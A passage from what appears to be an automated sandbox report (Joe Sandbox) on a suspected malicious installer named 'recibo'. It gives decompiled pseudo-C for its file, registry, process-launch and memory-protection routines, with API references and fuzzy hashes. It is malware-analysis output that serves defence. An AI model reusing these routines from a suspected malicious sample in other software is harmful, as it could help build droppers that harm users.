                                                                                  				return 0;
                                                                                  			}








                                                                                  APIs
                                                                                  • MoveFileW.KERNEL32(00000000,00000000), ref: 00401696
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileMove
                                                                                  • String ID:
                                                                                  • API String ID: 3562171763-0
                                                                                  • Opcode ID: 37dd8d0ca5ccfa2b7dc85521419f1992b48514a6c3f6d2a4e9192acb65122244
                                                                                  • Instruction ID: 97031ceaf8e9c96da62d10e645a43f8a4e886df5684b2e10da682d8a0e9c10a3
                                                                                  • Opcode Fuzzy Hash: 37dd8d0ca5ccfa2b7dc85521419f1992b48514a6c3f6d2a4e9192acb65122244
                                                                                  • Instruction Fuzzy Hash: C3F09631A08124E6CB117BA69E4DE5E21549F82364B24063FF011B11D1D9BCC902659E
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 33%
                                                                                  			E00402891(intOrPtr __edx, void* __eflags) {
                                                                                  				long _t8;
                                                                                  				long _t10;
                                                                                  				LONG* _t12;
                                                                                  				void* _t14;
                                                                                  				intOrPtr _t15;
                                                                                  				void* _t16;
                                                                                  				void* _t19;
                                                                                  
                                                                                  				_t15 = __edx;
                                                                                  				_pop(ds);
                                                                                  				if(__eflags != 0) {
                                                                                  					_t8 = E00402D84(2);
                                                                                  					_pop(_t14);
                                                                                  					 *((intOrPtr*)(_t19 - 0x10)) = _t15;
                                                                                  					_t10 = SetFilePointer(E0040649D(_t14, _t16), _t8, _t12,  *(_t19 - 0x24)); // executed
                                                                                  					if( *((intOrPtr*)(_t19 - 0x2c)) >= _t12) {
                                                                                  						_push(_t10);
                                                                                  						_push( *((intOrPtr*)(_t19 - 0xc)));
                                                                                  						E00406484();
                                                                                  					}
                                                                                  				}
                                                                                  				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t19 - 4));
                                                                                  				return 0;
                                                                                  			}











                                                                                  APIs
                                                                                  • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 004028AF
                                                                                    • Part of subcall function 00406484: wsprintfW.USER32 ref: 00406491
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: FilePointerwsprintf
                                                                                  • String ID:
                                                                                  • API String ID: 327478801-0
                                                                                  • Opcode ID: 1a69bed114d0c3cb27e295a60469d00fb85b85c1c8bbaab52ea3f411131a6a45
                                                                                  • Instruction ID: a13d1cf18dcce6f7d85bed0b4e0fde0de6b16079219dfacd376ffc086bc6f252
                                                                                  • Opcode Fuzzy Hash: 1a69bed114d0c3cb27e295a60469d00fb85b85c1c8bbaab52ea3f411131a6a45
                                                                                  • Instruction Fuzzy Hash: D3E09271A04105BFDB01EFA5AE499AEB3B8EF44319B10483BF102F00C1DA794D119B2D
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E004023B2(int __eax, WCHAR* __ebx) {
                                                                                  				WCHAR* _t11;
                                                                                  				WCHAR* _t13;
                                                                                  				void* _t17;
                                                                                  				int _t21;
                                                                                  
                                                                                  				_t11 = __ebx;
                                                                                  				_t5 = __eax;
                                                                                  				_t13 = 0;
                                                                                  				if(__eax != __ebx) {
                                                                                  					__eax = E00402DA6(__ebx);
                                                                                  				}
                                                                                  				if( *((intOrPtr*)(_t17 - 0x2c)) != _t11) {
                                                                                  					_t13 = E00402DA6(0x11);
                                                                                  				}
                                                                                  				if( *((intOrPtr*)(_t17 - 0x20)) != _t11) {
                                                                                  					_t11 = E00402DA6(0x22);
                                                                                  				}
                                                                                  				_t5 = WritePrivateProfileStringW(0, _t13, _t11, E00402DA6(0xffffffcd)); // executed
                                                                                  				_t21 = _t5;
                                                                                  				if(_t21 == 0) {
                                                                                  					 *((intOrPtr*)(_t17 - 4)) = 1;
                                                                                  				}
                                                                                  				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t17 - 4));
                                                                                  				return 0;
                                                                                  			}








                                                                                  APIs
                                                                                  • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004023E9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: PrivateProfileStringWrite
                                                                                  • String ID:
                                                                                  • API String ID: 390214022-0
                                                                                  • Opcode ID: 498f41ba95d1dc934bc83887be66b3af98def7cf3aba53834c7129a1bd888199
                                                                                  • Instruction ID: de4cb5ca612a6b97b91745c8380e1d92b079ec7b797fcdaf288f77766e75fad7
                                                                                  • Opcode Fuzzy Hash: 498f41ba95d1dc934bc83887be66b3af98def7cf3aba53834c7129a1bd888199
                                                                                  • Instruction Fuzzy Hash: FAE04F31900124BBDF603AB11F8DEAE205C6FC6744B18013EF911BA1C2E9FC8C4146AD
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E004063D8(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
                                                                                  				void* _t7;
                                                                                  				long _t8;
                                                                                  				void* _t9;
                                                                                  
                                                                                  				_t7 = E00406329(_a4,  &_a12);
                                                                                  				if(_t7 != 0) {
                                                                                  					_t8 = RegCreateKeyExW(_t7, _a8, 0, 0, 0, _a12, 0, _a16, 0); // executed
                                                                                  					return _t8;
                                                                                  				}
                                                                                  				_t9 = 6;
                                                                                  				return _t9;
                                                                                  			}







                                                                                  APIs
                                                                                  • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402E57,00000000,?,?), ref: 00406401
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Create
                                                                                  • String ID:
                                                                                  • API String ID: 2289755597-0
                                                                                  • Opcode ID: f0170b29b94a961cdf0cc122a920c286c7e5b726b195fdee8f598fb45efbb6e4
                                                                                  • Instruction ID: ccab944935cfefb85f0e849ce69279fb55db75a3b7fb0960311cd9d36817041a
                                                                                  • Opcode Fuzzy Hash: f0170b29b94a961cdf0cc122a920c286c7e5b726b195fdee8f598fb45efbb6e4
                                                                                  • Instruction Fuzzy Hash: 04E0E6B2010109BFEF095F90DC0AD7B3B1DE704300F01892EFD06D4091E6B5AD306675
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E004060DF(void* _a4, void* _a8, long _a12) {
                                                                                  				int _t7;
                                                                                  				long _t11;
                                                                                  
                                                                                  				_t11 = _a12;
                                                                                  				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                                                  				if(_t7 == 0 || _t11 != _a12) {
                                                                                  					return 0;
                                                                                  				} else {
                                                                                  					return 1;
                                                                                  				}
                                                                                  			}






                                                                                  APIs
                                                                                  • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403498,00000000,0041EA20,000000FF,0041EA20,000000FF,000000FF,00000004,00000000), ref: 004060F3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileWrite
                                                                                  • String ID:
                                                                                  • API String ID: 3934441357-0
                                                                                  • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                  • Instruction ID: d8d859634201a592f38c73999a999f352708a9e59580de02994c407fa40ca669
                                                                                  • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                  • Instruction Fuzzy Hash: FAE08C3220026AABEF109E60DC04AEB3B6CFB00360F014837FA16E7081E270E93087A4
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E004060B0(void* _a4, void* _a8, long _a12) {
                                                                                  				int _t7;
                                                                                  				long _t11;
                                                                                  
                                                                                  				_t11 = _a12;
                                                                                  				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                                                  				if(_t7 == 0 || _t11 != _a12) {
                                                                                  					return 0;
                                                                                  				} else {
                                                                                  					return 1;
                                                                                  				}
                                                                                  			}






                                                                                  APIs
                                                                                  • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034E2,00000000,00000000,00403306,000000FF,00000004,00000000,00000000,00000000), ref: 004060C4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileRead
                                                                                  • String ID:
                                                                                  • API String ID: 2738559852-0
                                                                                  • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                                  • Instruction ID: 1583d2e05e1cff28e3594e7db3f0db2d88eef65457287744bb544c492d9958e5
                                                                                  • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                                  • Instruction Fuzzy Hash: AEE0EC322502AAABDF10AE65DC04AEB7B6CEB05361F018936FD16E6150E631E92197A4
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			_entry_(intOrPtr _a4, intOrPtr _a8) {
                                                                                  
                                                                                  				 *0x71545048 = _a4;
                                                                                  				if(_a8 == 1) {
                                                                                  					VirtualProtect(0x7154505c, 4, 0x40, 0x7154504c); // executed
                                                                                  					 *0x7154505c = 0xc2;
                                                                                  					 *0x7154504c = 0;
                                                                                  					 *0x71545054 = 0;
                                                                                  					 *0x71545068 = 0;
                                                                                  					 *0x71545058 = 0;
                                                                                  					 *0x71545050 = 0;
                                                                                  					 *0x71545060 = 0;
                                                                                  					 *0x7154505e = 0;
                                                                                  				}
                                                                                  				return 1;
                                                                                  			}




                                                                                  APIs
                                                                                  • VirtualProtect.KERNELBASE(7154505C,00000004,00000040,7154504C), ref: 71542A9D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23409278912.0000000071541000.00000020.00000001.01000000.00000004.sdmp, Offset: 71540000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23409236416.0000000071540000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000001.00000002.23409345991.0000000071544000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000001.00000002.23409401287.0000000071546000.00000002.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_71540000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: ProtectVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 544645111-0
                                                                                  • Opcode ID: 9cd8d5e50c349d526449c4257ee4e49010863ce40793ff42845b6072ff94cc6d
                                                                                  • Instruction ID: 37f108c219235121d58f2c7da2d7ea0a43321af300d78f8999359934b43c51cb
                                                                                  • Opcode Fuzzy Hash: 9cd8d5e50c349d526449c4257ee4e49010863ce40793ff42845b6072ff94cc6d
                                                                                  • Instruction Fuzzy Hash: 66F0C9BA568384DEC369CF3B84447093FF0BB09304B36462AEDACDA240E3744048DB91
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E004063AA(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
                                                                                  				void* _t7;
                                                                                  				long _t8;
                                                                                  				void* _t9;
                                                                                  
                                                                                  				_t7 = E00406329(_a4,  &_a12);
                                                                                  				if(_t7 != 0) {
                                                                                  					_t8 = RegOpenKeyExW(_t7, _a8, 0, _a12, _a16); // executed
                                                                                  					return _t8;
                                                                                  				}
                                                                                  				_t9 = 6;
                                                                                  				return _t9;
                                                                                  			}







                                                                                  APIs
                                                                                  • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,00406438,?,00000000,?,?,Call,?), ref: 004063CE
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Open
                                                                                  • String ID:
                                                                                  • API String ID: 71445658-0
                                                                                  • Opcode ID: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
                                                                                  • Instruction ID: 4361357c0318622cec318f667d88df30c4c29b75262f7bca7234b06b46464da2
                                                                                  • Opcode Fuzzy Hash: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
                                                                                  • Instruction Fuzzy Hash: 83D0123210020EBBDF115F91AD01FAB3B5DAB08310F014426FE06E40A1D775D530A764
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E004015A3() {
                                                                                  				int _t5;
                                                                                  				void* _t11;
                                                                                  				int _t14;
                                                                                  
                                                                                  				_t5 = SetFileAttributesW(E00402DA6(0xfffffff0),  *(_t11 - 0x2c)); // executed
                                                                                  				_t14 = _t5;
                                                                                  				if(_t14 == 0) {
                                                                                  					 *((intOrPtr*)(_t11 - 4)) = 1;
                                                                                  				}
                                                                                  				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t11 - 4));
                                                                                  				return 0;
                                                                                  			}







                                                                                  APIs
                                                                                  • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: AttributesFile
                                                                                  • String ID:
                                                                                  • API String ID: 3188754299-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E004044E5(int _a4) {
                                                                                  				struct HWND__* _t2;
                                                                                  				long _t3;
                                                                                  
                                                                                  				_t2 =  *0x433ed8; // 0x1043c
                                                                                  				if(_t2 != 0) {
                                                                                  					_t3 = SendMessageW(_t2, _a4, 0, 0); // executed
                                                                                  					return _t3;
                                                                                  				}
                                                                                  				return _t2;
                                                                                  			}






                                                                                  APIs
                                                                                  • SendMessageW.USER32(0001043C,00000000,00000000,00000000), ref: 004044F7
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend
                                                                                  • String ID:
                                                                                  • API String ID: 3850602802-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E00405B63(struct _SHELLEXECUTEINFOW* _a4) {
                                                                                  				struct _SHELLEXECUTEINFOW* _t4;
                                                                                  				int _t5;
                                                                                  
                                                                                  				_t4 = _a4;
                                                                                  				_t4->lpIDList = _t4->lpIDList & 0x00000000;
                                                                                  				_t4->cbSize = 0x3c; // executed
                                                                                  				_t5 = ShellExecuteExW(_t4); // executed
                                                                                  				return _t5;
                                                                                  			}






                                                                                  APIs
                                                                                  • ShellExecuteExW.SHELL32(?), ref: 00405B72
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExecuteShell
                                                                                  • String ID:
                                                                                  • API String ID: 587946157-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E004044CE(int _a4) {
                                                                                  				long _t2;
                                                                                  
                                                                                  				_t2 = SendMessageW( *0x434f08, 0x28, _a4, 1); // executed
                                                                                  				return _t2;
                                                                                  			}





                                                                                  APIs
                                                                                  • SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend
                                                                                  • String ID:
                                                                                  • API String ID: 3850602802-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E004034E5(long _a4) {
                                                                                  				long _t2;
                                                                                  
                                                                                  				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
                                                                                  				return _t2;
                                                                                  			}





                                                                                  APIs
                                                                                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403242,?,?,?,?,?,?,0040387D,?), ref: 004034F3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: FilePointer
                                                                                  • String ID:
                                                                                  • API String ID: 973152223-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E004044BB(int _a4) {
                                                                                  				int _t2;
                                                                                  
                                                                                  				_t2 = EnableWindow( *0x42d264, _a4); // executed
                                                                                  				return _t2;
                                                                                  			}





                                                                                  APIs
                                                                                  • KiUserCallbackDispatcher.NTDLL(?,00404292), ref: 004044C5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: CallbackDispatcherUser
                                                                                  • String ID:
                                                                                  • API String ID: 2492992576-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 78%
                                                                                  			E00401FA4(void* __ecx) {
                                                                                  				void* _t9;
                                                                                  				intOrPtr _t13;
                                                                                  				void* _t15;
                                                                                  				void* _t17;
                                                                                  				void* _t20;
                                                                                  				void* _t22;
                                                                                  
                                                                                  				_t17 = __ecx;
                                                                                  				_t19 = E00402DA6(_t15);
                                                                                  				E0040559F(0xffffffeb, _t7); // executed
                                                                                  				_t9 = E00405B20(_t19); // executed
                                                                                  				_t20 = _t9;
                                                                                  				if(_t20 == _t15) {
                                                                                  					 *((intOrPtr*)(_t22 - 4)) = 1;
                                                                                  				} else {
                                                                                  					if( *((intOrPtr*)(_t22 - 0x28)) != _t15) {
                                                                                  						_t13 = E004069B5(_t17, _t20);
                                                                                  						if( *((intOrPtr*)(_t22 - 0x2c)) < _t15) {
                                                                                  							if(_t13 != _t15) {
                                                                                  								 *((intOrPtr*)(_t22 - 4)) = 1;
                                                                                  							}
                                                                                  						} else {
                                                                                  							E00406484( *((intOrPtr*)(_t22 - 0xc)), _t13);
                                                                                  						}
                                                                                  					}
                                                                                  					_push(_t20);
                                                                                  					CloseHandle();
                                                                                  				}
                                                                                  				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t22 - 4));
                                                                                  				return 0;
                                                                                  			}










                                                                                  APIs
                                                                                    • Part of subcall function 0040559F: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsf321E.tmp\System.dll,00000000,004231B5,773423A0,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                                                                                    • Part of subcall function 0040559F: lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nsf321E.tmp\System.dll,00000000,004231B5,773423A0,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                                                                                    • Part of subcall function 0040559F: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsf321E.tmp\System.dll,00403418), ref: 004055FA
                                                                                    • Part of subcall function 0040559F: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsf321E.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsf321E.tmp\System.dll), ref: 0040560C
                                                                                    • Part of subcall function 0040559F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                                                                                    • Part of subcall function 0040559F: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                                                                                    • Part of subcall function 0040559F: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                                                                                    • Part of subcall function 00405B20: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,00000000,00000000), ref: 00405B49
                                                                                    • Part of subcall function 00405B20: CloseHandle.KERNEL32(?), ref: 00405B56
                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FEB
                                                                                    • Part of subcall function 004069B5: WaitForSingleObject.KERNEL32(?,00000064), ref: 004069C6
                                                                                    • Part of subcall function 004069B5: GetExitCodeProcess.KERNEL32(?,?), ref: 004069E8
                                                                                    • Part of subcall function 00406484: wsprintfW.USER32 ref: 00406491
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                                  • String ID:
                                                                                  • API String ID: 2972824698-0
                                                                                  • Opcode ID: fa18f46a8673bca6434a5c9373a6cbc3dc8609fa07edefac18420a2ce970209b
                                                                                  • Instruction ID: a015d294fcb9cc4e365613bb9e09bf6e78b00889af70ee47f703a6c6056ea9c8
                                                                                  • Opcode Fuzzy Hash: fa18f46a8673bca6434a5c9373a6cbc3dc8609fa07edefac18420a2ce970209b
                                                                                  • Instruction Fuzzy Hash: 2DF09072904112EBCB21BBA59A84EDE76E8DF01318F25403BE102B21D1D77C4E429A6E
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 78%
                                                                                  			E0040498A(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
                                                                                  				signed int _v8;
                                                                                  				signed int _v12;
                                                                                  				long _v16;
                                                                                  				long _v20;
                                                                                  				long _v24;
                                                                                  				char _v28;
                                                                                  				intOrPtr _v32;
                                                                                  				long _v36;
                                                                                  				char _v40;
                                                                                  				unsigned int _v44;
                                                                                  				signed int _v48;
                                                                                  				WCHAR* _v56;
                                                                                  				intOrPtr _v60;
                                                                                  				intOrPtr _v64;
                                                                                  				intOrPtr _v68;
                                                                                  				WCHAR* _v72;
                                                                                  				void _v76;
                                                                                  				struct HWND__* _v80;
                                                                                  				void* __ebx;
                                                                                  				void* __edi;
                                                                                  				void* __esi;
                                                                                  				intOrPtr _t82;
                                                                                  				long _t87;
                                                                                  				short* _t89;
                                                                                  				void* _t95;
                                                                                  				signed int _t96;
                                                                                  				int _t109;
                                                                                  				signed short _t114;
                                                                                  				signed int _t118;
                                                                                  				struct HWND__** _t122;
                                                                                  				intOrPtr* _t138;
                                                                                  				WCHAR* _t146;
                                                                                  				intOrPtr _t147;
                                                                                  				unsigned int _t150;
                                                                                  				signed int _t152;
                                                                                  				unsigned int _t156;
                                                                                  				signed int _t158;
                                                                                  				signed int* _t159;
                                                                                  				signed int* _t160;
                                                                                  				struct HWND__* _t166;
                                                                                  				struct HWND__* _t167;
                                                                                  				int _t169;
                                                                                  				unsigned int _t197;
                                                                                  
                                                                                  				_t156 = __edx;
                                                                                  				_t82 =  *0x42c240; // 0x5bcfcc
                                                                                  				_v32 = _t82;
                                                                                  				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x436000;
                                                                                  				_v12 =  *((intOrPtr*)(_t82 + 0x38));
                                                                                  				if(_a8 == 0x40b) {
                                                                                  					E00405B81(0x3fb, _t146);
                                                                                  					E004067C4(_t146);
                                                                                  				}
                                                                                  				_t167 = _a4;
                                                                                  				if(_a8 != 0x110) {
                                                                                  					L8:
                                                                                  					if(_a8 != 0x111) {
                                                                                  						L20:
                                                                                  						if(_a8 == 0x40f) {
                                                                                  							L22:
                                                                                  							_v8 = _v8 & 0x00000000;
                                                                                  							_v12 = _v12 & 0x00000000;
                                                                                  							E00405B81(0x3fb, _t146);
                                                                                  							if(E00405F14(_t186, _t146) == 0) {
